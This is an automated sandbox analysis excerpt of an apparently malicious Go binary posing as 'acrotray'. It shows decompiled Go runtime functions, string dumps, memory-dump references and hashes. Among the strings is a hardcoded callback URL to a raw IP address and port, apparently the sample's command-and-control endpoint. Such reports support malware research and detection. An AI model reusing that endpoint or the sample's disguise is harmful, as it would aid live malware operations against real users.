    						L00433DD0(L00433FD0(_t60, _t61, _t62, _t63, _t64, _t98, _t103), _t98);
    						 *_t101 = "VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusforEachP: sched.safePointWait != 0http2: aborting request body writehttp: connection has been hijackedhttp: persistConn.readLoop exitinghttp: read on closed response bodyinvalid padding bits in BIT STRINGmspan.ensureSwept: m is not lockedout of memory allocating allArenasreflect.FuncOf: too many argumentsreflect: Field index out of boundsreflect: Method index out of rangereflect: string index out of rangeruntime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workstream error: stream ID %d; %v; %vtimeout waiting for client prefacetls: invalid certificate signaturetls: malformed key_share extensiontoo many references: cannot spliceunexpected runtime.netpoll error: unsupported authentication method x509: Ed25519 verification failurex509: unhandled critical extension%d response missing Location header\'_\' must separate successive digits1776356839400250464677810668945312588817841970012523233890533447265625CONTINUATION frame with stream ID 0SubscribeServiceChangeNotificationschacha20: output smaller than inputcrypto/md5: invalid hash state sizedynamic table size update too largeed25519: cannot sign hashed messageencoding/hex: odd length hex stringexecutable file not found in %PATH%file type does not support deadlinefindfunc: bad findfunctab entry idxfindrunnable: netpoll with spinningflate: corrupt input before offset greyobject: obj not pointer-alignedhash/crc32: invalid hash state sizehpack: invalid Huffman-encoded datahttp: server closed idle connectionhttp://185.112.83.96:20000/callbackmheap.freeSpanLocked - invalid freemime: bogus characters after %%: %qmime: invalid RFC 2047 encoded-wordnetwork dropped connection on resetno such multicast network interfacepersistentalloc: align is too largepidleput: P has non-empty run queuereflect.MakeSlice of non-slice typeruntime: close polldesc w/o unblockruntime: createevent failed; errno=runtime: inconsistent read deadlinesuperfluous leading zeros in lengthtls: invalid or missing PSK binderstls: server selected an invalid PSKtls: too many non-advancing recordstoo many Questions to pack (>65535)traceback did not unwind completelytransform: short destination buffertransport endpoint is not connectedx509: decryption password incorrectx509: wrong Ed25519 public key sizezlib: invalid compression level: %d LastStreamID=%v ErrCode=%v Debug=%q0123456789abcdefghijklmnopqrstuvwxyz44408920985006261616945266723632812586b4f9e6-366b-47b0-ab4e-15c6cd2f7074Go pointer stored into non-Go memoryIA5String contains invalid characterMStats vs MemStatsType size mismatchTime.UnmarshalBinary: invalid lengthUnable to determine system directoryaccessing a corrupted shared librarycompressed name in SRV resource datacrypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0crypto/sha1: invalid hash state sizecrypto/sha512: invalid hash functionhttp: no Location header in responsehttp: unexpected EOF reading trailermalformed MIME header initial line: no acceptable authentication methodsreflect: IsVariadic of non-func typereflect: NumField of non-struct typereflect: funcLayout of non-func typeruntime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackstrings.Builder.Grow: negative countsyntax error scanning complex numbertls: server did not send a key shareuncaching span but s.allocCount == 0unsupported SSLv2 handshake receivedx509: zero or negative DSA parameter) is smaller than minimum page size (2220446049250313080847263336181640625Could not Create DIB Section err:%d.\nCould not Get primary display err:%d\nUnsubscribeServiceChangeNotifications_cgo_notify_runtime_init_done missingall goroutines are asleep - deadlock!bytes.Buffer: truncation out of rangecannot exec a shared library directlychacha20poly1305: plaintext too largecipher: message authentication failedcrypto/cipher: incorrect GCM tag sizecrypto/cipher: invalid buffer overlapcrypto/rsa: public exponent too largecrypto/rsa: public exponent too smallcrypto/rsa: unsupported hash functioncrypto: Size of unknown hash functionexplicitly tagged member didn\'t matchhash/adler32: invalid hash state sizeinternal error: unknown network type reflect.Value.Bytes of non-byte slicereflect.Value.Bytes of non-rune slicereflect: Bits of non-arithmetic Type runtime: allocation size out of rangeruntime: failed mSpanList.insertBack setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpsubtle: slices have different lengthstls: unsupported certificate key (%T)too many Additionals to pack (>65535)too many Authorities to pack (>65535)unexpected CONTINUATION for stream %dvalue too large for defined data typex509: RSA key missing NULL parameters1110223024625156540423631668090820312555511151231257827021181583404541015625Could not Get primary display err:%d.\nUnable to determine system directory: arg size to reflect.call more than 1GBcan not access a needed shared librarychacha20poly1305: ciphertext too largeconcurrent map iteration and map writecrypto/sha256: invalid hash state sizecrypto/sha512: invalid hash state sizeencoding alphabet is not 64-bytes longfailed to parse Location header %q: %vgcBgMarkWorker: blackening not enabledinsufficient data for base length typeinternal error: unknown string type %dmakechan: invalid channel element typemime: expected slash after first tokennet/http: invalid header field name %qruntime: blocked read on free polldescruntime: sudog with non-false isSelecttime: missing Location in call to Datetls: client sent unexpected early datatls: failed to sign ECDHE parameters: tls: internal error: unsupported curvetls: invalid ClientKeyExchange messagetls: invalid ServerKeyExchange messagetls: missing ServerKeyExchange messagetls: server selected unsupported curvetls: server selected unsupported grouptls: unsupported signing key type (%T)x509: cannot validate certificate for x509: empty name constraints extensionx509: trailing data after X.509 key-id because it doesn\'t contain any IP SANs2006-01-02 15:04:05.999999999 -0700 MST277555756156289135105907917022705078125Could not Create Compatible DC err:%d.\nPowerRegisterSuspendResumeNotification";
    						_v152 = 0x22;
    						L00433220(_t98);
    						goto L7;
    					}
    					L2:
    					_t82 = _v48;
    					_t94 = _t82 + 0x4000;
    					_v80 = _t94;
    					_t95 =  *((intOrPtr*)( *[gs:0x28]));
    					_t89 =  *((intOrPtr*)(_t95 + 8));
    					_v64 = _t89;
    					if(_t94 > _t89 || _t89 > 0x4000000) {
    						L5:
    						L00433D40(_t42, _t98);
    						 *_t101 =  &M006EBF74;
    						_v152 = 0x13;
    						L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103);
    						 *_t101 = _v80;
    						L00434560(_t61, _t62, _t63, _t64, _t98, _t103);
    						 *_t101 =  &M006E6129;
    						_v152 = 1;
    						L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103);
    						 *_t101 = _v64;
    						L00434560(_t61, _t62, _t63, _t64, _t98, _t103);
    						 *_t101 = 0x6e6161;
    						_v152 = 2;
    						L00433DD0(L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103), _t98);
    						_t78 =  &M006E88B1;
    						 *_t101 = _t78;
    						_v152 = 0xc;
    						L00433220(_t98);
    						goto L6;
    					}
    					L4:
    					 *_t95 = _t94;
    					_t88 = _t82 + 0x5370;
    					 *((long long*)(_t95 + 0x10)) = _t88;
    					 *((long long*)(_t95 + 0x18)) = _t88;
    					return E0045E250(_t42);
    					L8:
    					L7:
    					E0045C900(_t95, _t98);
    				}
    			}































    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431289
    0x00000000
    0x00000000
    0x0043128f
    0x0043128f
    0x00431296
    0x0043129e
    0x004312a6
    0x004312b6
    0x004312ba
    0x004312c3
    0x004312cc
    0x004312da
    0x004312df
    0x004312e2
    0x004312e7
    0x004312f0
    0x0043130e
    0x00431315
    0x00431318
    0x0043131d
    0x00431322
    0x00431331
    0x0043133a
    0x0043133f
    0x00431344
    0x00431349
    0x00431352
    0x0043135d
    0x0043144e
    0x0043144e
    0x00431456
    0x0043145b
    0x00431467
    0x0043146b
    0x00431474
    0x0043147e
    0x00431482
    0x0043148c
    0x00431498
    0x0043149c
    0x004314a5
    0x00000000
    0x004314a5
    0x00431363
    0x00431363
    0x00431368
    0x0043136f
    0x0043137d
    0x00431384
    0x00431388
    0x00431390
    0x004313c4
    0x004313c4
    0x004313d0
    0x004313d4
    0x004313dd
    0x004313e7
    0x004313eb
    0x004313f7
    0x004313fb
    0x00431404
    0x0043140e
    0x00431412
    0x0043141e
    0x00431422
    0x00431430
    0x00431435
    0x0043143c
    0x00431440
    0x00431449
    0x00000000
    0x00431449
    0x0043139e
    0x0043139e
    0x004313a1
    0x004313a7
    0x004313ab
    0x004313c3
    0x00000000
    0x004314ab
    0x004314ab
    0x004314ab

    Strings
    • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycomctl32.dllcomdlg32.dllcontent-typecontext.TODOdebugCall128dumping heapend tracegcentersyscallexit status gcpacertracegetaddrinfowhost is downhttp2deb, xrefs: 00431435
    • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00431460
    • VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusforEachP: sched.safePointWait != 0http2: aborting reques, xrefs: 00431491
    • ,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 004313F0
    • 0, xrefs: 00431349
    • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filestoo much pixel dataunknown Go type: %vunknown certificateunknown cipher typeunknown statu, xrefs: 004313C9
    • ", xrefs: 0043149C
    Memory Dump Source
    • Source File: 00000045.00000002.561046573.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000045.00000002.561033922.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000045.00000002.562359458.00000000008DC000.00000040.00020000.sdmp Download File
    • Associated: 00000045.00000002.562380590.00000000008F7000.00000040.00020000.sdmp Download File
    • Associated: 00000045.00000002.562397728.00000000008FA000.00000040.00020000.sdmp Download File
    • Associated: 00000045.00000002.562417198.00000000008FD000.00000040.00020000.sdmp Download File
    • Associated: 00000045.00000002.562434644.00000000008FE000.00000080.00020000.sdmp Download File
    • Associated: 00000045.00000002.562449559.00000000008FF000.00000004.00020000.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_69_2_400000_acrotray.jbxd
    Similarity
    • API ID:
    • String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$0$VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusforEachP: sched.safePointWait != 0http2: aborting reques$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycomctl32.dllcomdlg32.dllcontent-typecontext.TODOdebugCall128dumping heapend tracegcentersyscallexit status gcpacertracegetaddrinfowhost is downhttp2deb$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filestoo much pixel dataunknown Go type: %vunknown certificateunknown cipher typeunknown statu
    • API String ID: 0-735344959
    • Opcode ID: 9fff890d98466b29b5cc5f42db71fad23afb86daac7df5ea3f2d2c96fe400bb3
    • Instruction ID: 406224d717a5126b36259e59a2dfcca9e8291f132d8d349d47811cb3184dca4b
    • Opcode Fuzzy Hash: 9fff890d98466b29b5cc5f42db71fad23afb86daac7df5ea3f2d2c96fe400bb3
    • Instruction Fuzzy Hash: C7513836508F8185DB10DF55F48539AB3A4F7897A4F50922AEADC03BA9EF7CC1A4CB04
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0043D8E0(long long __rbp, long long _a8) {
    				char _v8;
    				long long _v16;
    				long long _v24;
    				long long _v32;
    				long long _v40;
    				long long _v48;
    				long long _v56;
    				long long _v64;
    				long long _v72;
    				long long _v80;
    				void* _t59;
    				void* _t62;
    				void* _t63;
    				void* _t64;
    				void* _t82;
    				void* _t83;
    				void* _t85;
    				void* _t86;
    				void* _t87;
    				long long _t96;
    				long long _t98;
    				intOrPtr _t99;
    				long long _t102;
    				long long _t120;
    				intOrPtr _t123;
    				intOrPtr _t125;
    				long long _t128;
    				void* _t134;
    				long long* _t135;
    				void* _t137;
    				void* _t138;
    				void* _t139;
    				void* _t140;
    				void* _t141;
    				void* _t142;
    				void* _t143;
    				void* _t144;
    
    				L0:
    				while(1) {
    					L0:
    					_t132 = __rbp;
    					if(_t134 <=  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x10))) {
    						goto L11;
    					}
    					L1:
    					_t135 = _t134 - 0x58;
    					_v8 = __rbp;
    					_t132 =  &_v8;
    					_t96 =  *((intOrPtr*)( *[gs:0x28]));
    					_t123 =  *((intOrPtr*)(_t96 + 0x30));
    					_t128 =  *((intOrPtr*)(_t123 + 0xa0));
    					if(_t128 == 0 ||  *((long long*)(_t123 + 0x130)) == 0) {
    						L10:
    						 *_t135 =  &M006ECFA3;
    						_v80 = 0x15;
    						L00433220(_t132);
    						goto L11;
    					}
    					L3:
    					_v48 = _t96;
    					 *_t135 = _t128;
    					_t62 = E00441E60(_t59);
    					_t98 = _v80;
    					_v56 = _t98;
    					 *_t135 =  *((intOrPtr*)(_t98 + 0x38));
    					_t63 = E00441E80(_t62);
    					_t99 = _v48;
    					_t125 =  *((intOrPtr*)(_t99 + 0x30));
    					if(_v80 != _t125) {
    						L9:
    						 *_t135 =  *((intOrPtr*)(_t125 + 0xa0));
    						_t64 = E00441E60(_t63);
    						_t102 =  *((intOrPtr*)(_v48 + 0x30));
    						_v16 = _t102;
    						_v24 = _v80;
    						_t128 = _v56;
    						_t119 =  *((intOrPtr*)(_t128 + 0x38));
    						_v64 =  *((intOrPtr*)(_t128 + 0x38));
    						_v32 =  *((intOrPtr*)(_t102 + 0x130));
    						_t130 =  *((intOrPtr*)(_t128 + 0x40));
    						_v40 =  *((intOrPtr*)(_t128 + 0x40));
    						_v72 = _t128;
    						L00433D40(_t64, _t132);
    						 *_t135 =  &M006E8A9D;
    						_v80 = 0xc;
    						L004346A0(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x38)), _t128, _t132, _t138);
    						 *_t135 = _v16;
    						L00434650(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x40)), _t132, _t138);
    						 *_t135 = 0x6e68dd;
    						_v80 = 6;
    						L004346A0(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x38)), _t128, _t132, _t138);
    						 *_t135 = _v24;
    						L00434650(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x40)), _t132, _t138);
    						 *_t135 = 0x6e68e9;
    						_v80 = 6;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v64;
    						L00434560( *((intOrPtr*)(_t128 + 4)), _t85, _t86, _t87, _t132, _t138);
    						 *_t135 =  &M006E7E63;
    						_v80 = 0xb;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v32;
    						L00434650(_t82, _t85, _t86, _t87, _t130, _t132, _t138);
    						 *_t135 =  &M006E7E8F;
    						_v80 = 0xb;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v40;
    						L00434650(_t82, _t85, _t86, _t87, _t130, _t132, _t138);
    						 *_t135 =  &M006E7E9A;
    						_v80 = 0xb;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v72;
    						E004343F0(_t82, _t85, _t86, _t87, _t132, _t138);
    						L00433DD0(L00433FD0(_t82,  *((intOrPtr*)(_t128 + 4)), _t85, _t86, _t87, _t132, _t138), _t132);
    						 *_t135 = 0x6ef0e1;
    						_v80 = 0x19;
    						L00433220(_t132);
    						goto L10;
    					}
    					L4:
    					_t120 = _v56;
    					if( *((intOrPtr*)(_t120 + 0x40)) !=  *((intOrPtr*)(_t125 + 0x130)) ||  *((intOrPtr*)(_t120 + 4)) != 1) {
    						goto L9;
    					}
    					L6:
    					if( *0x8e6e10 != 0) {
    						 *_t135 =  *((intOrPtr*)(_t125 + 0xa0));
    						E00441E60(_t63);
    						 *_t135 = _v80;
    						_t63 = E00450DD0(_t83, _t87,  &_v8, _t137, _t138, _t139, _t140, _t141, _t142, _t143, _t144);
    						_t99 = _v48;
    						_t120 = _v56;
    					}
    					 *((long long*)( *((intOrPtr*)(_t99 + 0x30)) + 0xa0)) = 0;
    					 *((long long*)( *((intOrPtr*)(_t99 + 0x30)) + 0x130)) = 0;
    					 *((long long*)(_t120 + 0x38)) = 0;
    					 *((intOrPtr*)(_t120 + 4)) = 0;
    					_a8 = _t120;
    					return _t63;
    					L12:
    					L11:
    					E0045C900(_t128, _t132);
    				}
    			}








































    0x0043d8e0
    0x0043d8e0
    0x0043d8e0
    0x0043d8e0
    0x0043d8f4
    0x00000000
    0x00000000
    0x0043d8fa
    0x0043d8fa
    0x0043d8fe
    0x0043d903
    0x0043d911
    0x0043d918
    0x0043d91c
    0x0043d926
    0x0043db5f
    0x0043db66
    0x0043db6a
    0x0043db73
    0x00000000
    0x0043db73
    0x0043d93a
    0x0043d93a
    0x0043d93f
    0x0043d943
    0x0043d948
    0x0043d94d
    0x0043d956
    0x0043d95a
    0x0043d95f
    0x0043d964
    0x0043d96d
    0x0043d9fa
    0x0043da01
    0x0043da05
    0x0043da0f
    0x0043da13
    0x0043da1d
    0x0043da22
    0x0043da27
    0x0043da2b
    0x0043da37
    0x0043da3c
    0x0043da40
    0x0043da48
    0x0043da4d
    0x0043da59
    0x0043da5d
    0x0043da66
    0x0043da70
    0x0043da74
    0x0043da80
    0x0043da84
    0x0043da8d
    0x0043da97
    0x0043da9b
    0x0043daa7
    0x0043daab
    0x0043dab4
    0x0043dabe
    0x0043dac2
    0x0043dace
    0x0043dad2
    0x0043dadb
    0x0043dae5
    0x0043dae9
    0x0043daf5
    0x0043daf9
    0x0043db02
    0x0043db0c
    0x0043db10
    0x0043db1c
    0x0043db20
    0x0043db29
    0x0043db33
    0x0043db37
    0x0043db41
    0x0043db4d
    0x0043db51
    0x0043db5a
    0x00000000
    0x0043db5a
    0x0043d973
    0x0043d97a
    0x0043d983
    0x00000000
    0x00000000
    0x0043d98b
    0x0043d992
    0x0043d9d7
    0x0043d9db
    0x0043d9e5
    0x0043d9e9
    0x0043d9ee
    0x0043d9f3
    0x0043d9f3
    0x0043d998
    0x0043d9a7
    0x0043d9b2
    0x0043d9ba
    0x0043d9c1
    0x0043d9cf
    0x00000000
    0x0043db79
    0x0043db79
    0x0043db79

    Strings
    • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficsetupapi.dllshort buffert.mcount > 0t.xcount > 0transmitfileunknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid h, xrefs: 0043DA52
    • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/breakpoint trapunknown , xrefs: 0043DB5F
    • m->p= next= p->m= prev= span= varp=%d.exe(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEEndDocExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLockedLy, xrefs: 0043DA79
    • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0AppServicesBad GatewayBad Req, xrefs: 0043DAC7
    Memory Dump Source
    • Source File: 00000045.00000002.561046573.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000045.00000002.561033922.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000045.00000002.562359458.00000000008DC000.00000040.00020000.sdmp Download File
    • Associated: 00000045.00000002.562380590.00000000008F7000.00000040.00020000.sdmp Download File
    • Associated: 00000045.00000002.562397728.00000000008FA000.00000040.00020000.sdmp Download File
    • Associated: 00000045.00000002.562417198.00000000008FD000.00000040.00020000.sdmp Download File
    • Associated: 00000045.00000002.562434644.00000000008FE000.00000080.00020000.sdmp Download File
    • Associated: 00000045.00000002.562449559.00000000008FF000.00000004.00020000.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_69_2_400000_acrotray.jbxd
    Similarity
    • API ID:
    • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0AppServicesBad GatewayBad Req$ m->p= next= p->m= prev= span= varp=%d.exe(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEEndDocExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLockedLy$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/breakpoint trapunknown $releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficsetupapi.dllshort buffert.mcount > 0t.xcount > 0transmitfileunknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid h
    • API String ID: 0-348477168
    • Opcode ID: 4f1bc768ba684713f7d49c4cf9a919cb4985d05402df9d85e91072940844604f
    • Instruction ID: ad9af52888aaabd5dc0dbb80f5b1bf5a2b8d008500c109696c00bffb4176632a
    • Opcode Fuzzy Hash: 4f1bc768ba684713f7d49c4cf9a919cb4985d05402df9d85e91072940844604f
    • Instruction Fuzzy Hash: B961F23A209F84C5DB009F16F08535AB7A8F789B98F559066EACC07B29DF7CC0A4CB04
    Uniqueness

    Uniqueness Score: -1.00%